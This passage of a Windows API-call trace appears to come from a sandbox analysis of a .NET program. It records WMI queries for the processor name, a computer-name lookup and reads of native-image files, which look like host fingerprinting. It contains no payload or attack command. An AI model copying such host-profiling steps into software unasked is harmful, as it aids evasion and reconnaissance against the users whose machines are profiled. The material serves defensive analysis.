This=0x6730d00, pProxy=0x6730cfc, pAuthnSvc=0x41ea94, pAuthzSvc=0x41ea90, pServerPrincName=0x41ea88, pAuthnLevel=0x41ea8c, pImpLevel=0x41ea7c, pAuthInfo=0x41ea80, pCapabilites=0x41ea84 | out: pAuthnSvc=0x41ea94*=0xa, pAuthzSvc=0x41ea90*=0x0, pServerPrincName=0x41ea88, pAuthnLevel=0x41ea8c*=0x6, pImpLevel=0x41ea7c*=0x2, pAuthInfo=0x41ea80, pCapabilites=0x41ea84*=0x1) returned 0x0 [0108.911] IUnknown:Release (This=0x6730d00) returned 0x1 [0108.911] IUnknown:QueryInterface (in: This=0x6730cfc, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41ea38 | out: ppvObject=0x41ea38*=0x7770ec) returned 0x0 [0108.911] IUnknown:QueryInterface (in: This=0x6730cfc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41ea34 | out: ppvObject=0x41ea34*=0x6730d00) returned 0x0 [0108.911] IClientSecurity:SetBlanket (This=0x6730d00, pProxy=0x6730cfc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0108.912] IUnknown:Release (This=0x6730d00) returned 0x2 [0108.912] WbemLocator:IUnknown:Release (This=0x7770ec) returned 0x1 [0108.912] CoTaskMemFree (pv=0x758b38) [0108.913] IUnknown:QueryInterface (in: This=0x6730cfc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e620 | out: ppvObject=0x41e620*=0x7770ec) returned 0x0 [0108.913] WbemLocator:IUnknown:QueryInterface (in: This=0x7770ec, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e5dc | out: ppvObject=0x41e5dc*=0x0) returned 0x80004002 [0108.913] WbemLocator:IUnknown:QueryInterface (in: This=0x7770ec, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e3fc | out: ppvObject=0x41e3fc*=0x0) returned 0x80004002 [0108.913] WbemLocator:IUnknown:AddRef (This=0x7770ec) returned 0x3 [0108.913] WbemLocator:IUnknown:QueryInterface (in: This=0x7770ec, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41df3c | out: ppvObject=0x41df3c*=0x0) returned 0x80004002 [0108.914] WbemLocator:IUnknown:QueryInterface (in: This=0x7770ec, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41deec | out: ppvObject=0x41deec*=0x0) returned 0x80004002 [0108.914] WbemLocator:IUnknown:QueryInterface (in: This=0x7770ec, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41def8 | out: ppvObject=0x41def8*=0x77704c) returned 0x0 [0108.914] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x77704c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41df00 | out: pCid=0x41df00*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0108.914] WbemLocator:IUnknown:Release (This=0x77704c) returned 0x3 [0108.914] CoGetContextToken (in: pToken=0x41df58 | out: pToken=0x41df58) returned 0x0 [0108.914] CoGetContextToken (in: pToken=0x41e360 | out: pToken=0x41e360) returned 0x0 [0108.914] WbemLocator:IUnknown:QueryInterface (in: This=0x7770ec, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x7770d4) returned 0x0 [0108.914] WbemLocator:IRpcOptions:Query (in: This=0x7770d4, pPrx=0x7770ec, dwProperty=2, pdwValue=0x41e418 | out: pdwValue=0x41e418) returned 0x80004002 [0108.914] WbemLocator:IUnknown:Release (This=0x7770d4) returned 0x3 [0108.914] WbemLocator:IUnknown:Release (This=0x7770ec) returned 0x2 [0108.914] CoGetContextToken (in: pToken=0x41e930 | out: pToken=0x41e930) returned 0x0 [0108.915] CoGetContextToken (in: pToken=0x41e890 | out: pToken=0x41e890) returned 0x0 [0108.915] WbemLocator:IUnknown:QueryInterface (in: This=0x7770ec, riid=0x41e960*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x41e95c | out: ppvObject=0x41e95c*=0x6730cfc) returned 0x0 [0108.915] IUnknown:AddRef (This=0x6730cfc) returned 0x4 [0108.915] IUnknown:Release (This=0x6730cfc) returned 0x3 [0108.915] IUnknown:Release (This=0x6730cfc) returned 0x2 [0108.915] IUnknown:Release (This=0x672fbdc) returned 0x2 [0108.915] SysStringLen (param_1=0x0) returned 0x0 [0108.915] IEnumWbemClassObject:Reset (This=0x6730cfc) returned 0x0 [0108.915] CoTaskMemAlloc (cb=0x4) returned 0x7651b8 [0108.915] IEnumWbemClassObject:Next (in: This=0x6730cfc, lTimeout=-1, uCount=0x1, apObjects=0x7651b8, puReturned=0x348591c | out: apObjects=0x7651b8*=0x6730d38, puReturned=0x348591c*=0x1) returned 0x0 [0110.937] IUnknown:QueryInterface (in: This=0x6730d38, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e1e0 | out: ppvObject=0x41e1e0*=0x6730d38) returned 0x0 [0110.937] IUnknown:QueryInterface (in: This=0x6730d38, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e19c | out: ppvObject=0x41e19c*=0x0) returned 0x80004002 [0110.937] IUnknown:QueryInterface (in: This=0x6730d38, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41dfbc | out: ppvObject=0x41dfbc*=0x0) returned 0x80004002 [0110.938] IUnknown:AddRef (This=0x6730d38) returned 0x3 [0110.938] IUnknown:QueryInterface (in: This=0x6730d38, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dafc | out: ppvObject=0x41dafc*=0x0) returned 0x80004002 [0110.938] IUnknown:QueryInterface (in: This=0x6730d38, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41daac | out: ppvObject=0x41daac*=0x0) returned 0x80004002 [0110.938] IUnknown:QueryInterface (in: This=0x6730d38, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dab8 | out: ppvObject=0x41dab8*=0x6730d3c) returned 0x0 [0110.938] IMarshal:GetUnmarshalClass (in: This=0x6730d3c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dac0 | out: pCid=0x41dac0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0110.938] IUnknown:Release (This=0x6730d3c) returned 0x3 [0110.938] CoGetContextToken (in: pToken=0x41db18 | out: pToken=0x41db18) returned 0x0 [0110.938] CoGetContextToken (in: pToken=0x41df20 | out: pToken=0x41df20) returned 0x0 [0110.938] IUnknown:QueryInterface (in: This=0x6730d38, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dfb0 | out: ppvObject=0x41dfb0*=0x0) returned 0x80004002 [0110.938] IUnknown:Release (This=0x6730d38) returned 0x2 [0110.938] CoGetContextToken (in: pToken=0x41e4f0 | out: pToken=0x41e4f0) returned 0x0 [0110.938] CoGetContextToken (in: pToken=0x41e450 | out: pToken=0x41e450) returned 0x0 [0110.938] IUnknown:QueryInterface (in: This=0x6730d38, riid=0x41e520*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e51c | out: ppvObject=0x41e51c*=0x6730d38) returned 0x0 [0110.938] IUnknown:AddRef (This=0x6730d38) returned 0x4 [0110.938] IUnknown:Release (This=0x6730d38) returned 0x3 [0110.938] IUnknown:Release (This=0x6730d38) returned 0x2 [0110.938] CoTaskMemFree (pv=0x7651b8) [0110.938] CoGetContextToken (in: pToken=0x41e860 | out: pToken=0x41e860) returned 0x0 [0110.939] IUnknown:AddRef (This=0x6730d38) returned 0x3 [0110.939] IWbemClassObject:Get (in: This=0x6730d38, wszName="__GENUS", lFlags=0, pVal=0x41eb70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ebf0*=0, plFlavor=0x41ebec*=0 | out: pVal=0x41eb70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ebf0*=3, plFlavor=0x41ebec*=64) returned 0x0 [0110.939] IWbemClassObject:Get (in: This=0x6730d38, wszName="__PATH", lFlags=0, pVal=0x41eb54*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ebd8*=0, plFlavor=0x41ebd4*=0 | out: pVal=0x41eb54*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\CIMV2:Win32_Processor.DeviceID=\"CPU0\"", varVal2=0x0), pType=0x41ebd8*=8, plFlavor=0x41ebd4*=64) returned 0x0 [0110.939] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\CIMV2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x6c [0110.939] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\CIMV2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x6c [0110.939] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41eb80 | out: ppv=0x41eb80*=0x72015c) returned 0x0 [0110.939] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41eb78 | out: pAptType=0x41eb78*=1) returned 0x0 [0110.939] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41eb7c | out: ppvObject=0x41eb7c*=0x0) returned 0x80004002 [0110.939] IUnknown:Release (This=0x72015c) returned 0x1 [0110.940] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e4e8 | out: ppv=0x41e4e8*=0x6720d80) returned 0x0 [0110.940] WbemDefPath:IUnknown:QueryInterface (in: This=0x6720d80, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e700 | out: ppvObject=0x41e700*=0x0) returned 0x80004002 [0110.940] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6720d80, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e714 | out: ppvObject=0x41e714*=0x6730040) returned 0x0 [0110.940] WbemDefPath:IUnknown:Release (This=0x6720d80) returned 0x0 [0110.940] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730040, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e334 | out: ppvObject=0x41e334*=0x6730040) returned 0x0 [0110.941] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730040, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e2f0 | out: ppvObject=0x41e2f0*=0x0) returned 0x80004002 [0110.941] WbemDefPath:IUnknown:AddRef (This=0x6730040) returned 0x3 [0110.941] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730040, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dc4c | out: ppvObject=0x41dc4c*=0x0) returned 0x80004002 [0110.941] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730040, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0110.941] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730040, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dc08 | out: ppvObject=0x41dc08*=0x7651b8) returned 0x0 [0110.941] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7651b8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dc10 | out: pCid=0x41dc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0110.941] WbemDefPath:IUnknown:Release (This=0x7651b8) returned 0x3 [0110.941] CoGetContextToken (in: pToken=0x41dc68 | out: pToken=0x41dc68) returned 0x0 [0110.941] CoGetContextToken (in: pToken=0x41e070 | out: pToken=0x41e070) returned 0x0 [0110.941] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730040, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e100 | out: ppvObject=0x41e100*=0x0) returned 0x80004002 [0110.941] WbemDefPath:IUnknown:Release (This=0x6730040) returned 0x2 [0110.941] WbemDefPath:IUnknown:Release (This=0x6730040) returned 0x1 [0110.941] CoGetContextToken (in: pToken=0x41e9f8 | out: pToken=0x41e9f8) returned 0x0 [0110.941] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0110.941] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730040, riid=0x41ea28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41ea24 | out: ppvObject=0x41ea24*=0x6730040) returned 0x0 [0110.941] WbemDefPath:IUnknown:AddRef (This=0x6730040) returned 0x3 [0110.941] WbemDefPath:IUnknown:Release (This=0x6730040) returned 0x2 [0110.941] WbemDefPath:IWbemPath:SetText (This=0x6730040, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\CIMV2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x0 [0110.942] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x672f5a0, puCount=0x41ebac | out: puCount=0x41ebac*=0x2) returned 0x0 [0110.942] WbemDefPath:IWbemPath:GetText (in: This=0x672f5a0, lFlags=4, puBuffLength=0x41eba8*=0x0, pszText=0x0 | out: puBuffLength=0x41eba8*=0xf, pszText=0x0) returned 0x0 [0110.942] WbemDefPath:IWbemPath:GetText (in: This=0x672f5a0, lFlags=4, puBuffLength=0x41eba8*=0xf, pszText="00000000000000" | out: puBuffLength=0x41eba8*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0110.942] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x672f5a0, puCount=0x41eb78 | out: puCount=0x41eb78*=0x2) returned 0x0 [0110.942] WbemDefPath:IWbemPath:GetText (in: This=0x672f5a0, lFlags=4, puBuffLength=0x41eb74*=0x0, pszText=0x0 | out: puBuffLength=0x41eb74*=0xf, pszText=0x0) returned 0x0 [0110.942] WbemDefPath:IWbemPath:GetText (in: This=0x672f5a0, lFlags=4, puBuffLength=0x41eb74*=0xf, pszText="00000000000000" | out: puBuffLength=0x41eb74*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0110.942] IWbemClassObject:Get (in: This=0x6730d38, wszName="Name", lFlags=0, pVal=0x41eb74*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3486130*=0, plFlavor=0x3486134*=0 | out: pVal=0x41eb74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", varVal2=0x0), pType=0x3486130*=8, plFlavor=0x3486134*=0) returned 0x0 [0110.942] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0110.942] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0110.942] IWbemClassObject:Get (in: This=0x6730d38, wszName="Name", lFlags=0, pVal=0x41eb7c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3486130*=8, plFlavor=0x3486134*=0 | out: pVal=0x41eb7c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", varVal2=0x0), pType=0x3486130*=8, plFlavor=0x3486134*=0) returned 0x0 [0110.942] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0110.942] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0110.942] CoGetContextToken (in: pToken=0x41eaa8 | out: pToken=0x41eaa8) returned 0x0 [0110.942] WbemLocator:IUnknown:Release (This=0x7770ec) returned 0x1 [0110.943] IUnknown:Release (This=0x6730cfc) returned 0x0 [0110.949] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerName") returned 0x0 [0110.952] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0110.953] GetComputerNameW (in: lpBuffer=0x41e9e4, nSize=0x41ec5c | out: lpBuffer="XDUWTFONO", nSize=0x41ec5c) returned 1 [0110.961] SysReAllocStringLen (in: pbstr=0x41b5c8*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x41b5c8*="kernel32.dll") returned 1 [0110.961] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0110.962] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0110.965] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0110.976] CreateFileW (lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\cfbddeb6e93e8f421b92229b20e51233\\Microsoft.VisualBasic.ni.dll.aux" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.v9921e851#\\cfbddeb6e93e8f421b92229b20e51233\\microsoft.visualbasic.ni.dll.aux"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0110.976] GetLastError () returned 0x0 [0110.976] SysReAllocStringLen (in: pbstr=0x41b130*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\cfbddeb6e93e8f421b92229b20e51233\\Microsoft.VisualBasic.ni.dll.aux", len=0x85 | out: pbstr=0x41b130*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\cfbddeb6e93e8f421b92229b20e51233\\Microsoft.VisualBasic.ni.dll.aux") returned 1 [0110.976] GetThreadLocale () returned 0x409 [0110.976] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\cfbddeb6e93e8f421b92229b20e51233\\Microsoft.VisualBasic.ni.dll.aux", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0110.976] GetThreadLocale () returned 0x409 [0110.977] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\cfbddeb6e93e8f421b92229b20e51233\\Microsoft.VisualBasic.ni.dll.aux", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0110.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\cfbddeb6e93e8f421b92229b20e51233\\Microsoft.VisualBasic.ni.dll.aux", nBufferLength=0x104, lpBuffer=0x41aeb4, lpFilePart=0x41aeb0 | out: lpBuffer="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\cfbddeb6e93e8f421b92229b20e51233\\Microsoft.VisualBasic.ni.dll.aux", lpFilePart=0x41aeb0*="Microsoft.VisualBasic.ni.dll.aux") returned 0x85 [0110.977] SysReAllocStringLen (in: pbstr=0x41b130*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\cfbddeb6e93e8f421b92229b20e51233\\Microsoft.VisualBasic.ni.dll.aux", psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\cfbddeb6e93e8f421b92229b20e51233\\Microsoft.VisualBasic.ni.dll.aux", len=0x85 | out: pbstr=0x41b130*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\cfbddeb6e93e8f421b92229b20e51233\\Microsoft.VisualBasic.ni.dll.aux") returned 1 [0110.977] SysReAllocStringLen (in: pbstr=0x41b0e0*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\cfbddeb6e93e8f421b92229b20e51233\\Microsoft.VisualBasic.ni.dll.aux", len=0x85 | out: pbstr=0x41b0e0*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\cfbddeb6e93e8f421b92229b20e51233\\Microsoft.VisualBasic.ni.dll.aux") returned 1 [0110.977] CharLowerBuffW (in: lpsz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\cfbddeb6e93e8f421b92229b20e51233\\Microsoft.VisualBasic.ni.dll.aux", cchLength=0x85 | out: lpsz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.v9921e851#\\cfbddeb6e93e8f421b92229b20e51233\\microsoft.visualbasic.ni.dll.aux") returned 0x85 [0110.977] SysReAllocStringLen (in: pbstr=0x41b130*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\cfbddeb6e93e8f421b92229b20e51233\\Microsoft.VisualBasic.ni.dll.aux", psz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.v9921e851#\\cfbddeb6e93e8f421b92229b20e51233\\microsoft.visualbasic.ni.dll.aux", len=0x85 | out: pbstr=0x41b130*="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.v9921e851#\\cfbddeb6e93e8f421b92229b20e51233\\microsoft.visualbasic.ni.dll.aux") returned 1 [0110.977] SetLastError (dwErrCode=0x0) [0110.977] GetCurrentThreadId () returned 0xba4 [0110.977] GetCurrentThreadId () returned 0xba4 [0110.977] GetCurrentThreadId () returned 0xba4 [0110.977] GetCurrentThreadId () returned 0xba4 [0110.977] GetCurrentThreadId () returned 0xba4 [0110.977] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0110.977] GetCurrentThreadId () returned 0xba4 [0110.977] GetCurrentThreadId () returned 0xba4 [0110.977] GetCurrentThreadId () returned 0xba4 [0110.977] SetEvent (hEvent=0xbc) returned 1 [0110.977] GetFileSize (in: hFile=0x458, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ac [0110.978] GetCurrentThreadId () returned 0xba4 [0110.978] GetCurrentThreadId () returned 0xba4 [0110.978] GetCurrentThreadId () returned 0xba4 [0110.978] GetCurrentThreadId () returned 0xba4 [0110.978] GetCurrentThreadId () returned 0xba4 [0110.978] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0110.978] GetCurrentThreadId () returned 0xba4 [0110.978] GetCurrentThreadId () returned 0xba4 [0110.978] GetCurrentThreadId () returned 0xba4 [0110.978] SetEvent (hEvent=0xbc) returned 1 [0110.978] ReadFile (in: hFile=0x458, lpBuffer=0x77c7a0, nNumberOfBytesToRead=0x6ac, lpNumberOfBytesRead=0x41b1e4, lpOverlapped=0x0 | out: lpBuffer=0x77c7a0*, lpNumberOfBytesRead=0x41b1e4*=0x6ac, lpOverlapped=0x0) returned 1 [0110.980] GetCurrentThreadId () returned 